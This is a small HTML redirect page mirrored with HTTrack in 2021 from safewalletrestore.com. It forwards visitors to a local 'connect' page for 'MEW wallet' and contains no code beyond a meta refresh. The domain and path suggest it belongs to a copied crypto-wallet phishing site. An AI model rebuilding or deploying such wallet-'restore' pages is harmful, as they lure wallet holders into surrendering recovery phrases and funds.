<HTML>
<!-- Created by HTTrack Website Copier/3.49-2 [XR&CO'2014] -->

<!-- Mirrored from safewalletrestore.com/connect/?type=MEW+wallet by HTTrack Website Copier/3.x [XR&CO'2014], Wed, 05 May 2021 13:50:23 GMT -->
<!-- Added by HTTrack --><meta http-equiv="content-type" content="text/html;charset=iso-8859-1" /><!-- /Added by HTTrack -->
<HEAD>
<META HTTP-EQUIV="Content-Type" CONTENT="text/html;charset=UTF-8"><META HTTP-EQUIV="Refresh" CONTENT="0; URL=../connect38f2.html%3Ftype=MEW+wallet.html"><TITLE>Page has moved</TITLE>
</HEAD>
<BODY>
<A HREF="../connect38f2.html%3Ftype=MEW+wallet.html"><h3>Click here...</h3></A>
</BODY>
<!-- Created by HTTrack Website Copier/3.49-2 [XR&CO'2014] -->

<!-- Mirrored from safewalletrestore.com/connect/?type=MEW+wallet by HTTrack Website Copier/3.x [XR&CO'2014], Wed, 05 May 2021 13:50:36 GMT -->
</HTML>
